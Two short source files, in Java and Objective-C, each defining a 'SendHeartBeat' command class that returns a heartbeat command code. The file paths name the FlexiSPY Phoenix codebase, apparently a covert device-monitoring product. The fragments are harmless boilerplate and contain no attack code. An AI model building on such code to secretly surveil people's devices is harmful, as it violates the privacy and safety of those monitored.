File: 2012-01-11_v.1.03.2/Phoenix/src/com/vvt/prot/command/SendHeartBeat.java
package com.vvt.prot.command;

import com.vvt.prot.CommandCode;
import com.vvt.prot.CommandData;

public class SendHeartBeat implements CommandData {
	public CommandCode getCommand() {
		return CommandCode.SEND_HEARTBEAT;
	}
}

File: Mac/FlexiSPY Phoenix Mac 1.0.5/codebase/PhoenixEngine/Phoenix/ProtocolBuilder/Classes/Command/Send/SendHeartBeat.m
//
//  SendHeartBeat.m
//  ProtocolBuilder
//
//  Created by Pichaya Srifar on 7/26/11.
//  Copyright 2011 Vervata. All rights reserved.
//

#import "SendHeartBeat.h"


@implementation SendHeartBeat

- (CommandCode)getCommand {
	return SEND_HEARTBEAT;
}

@end
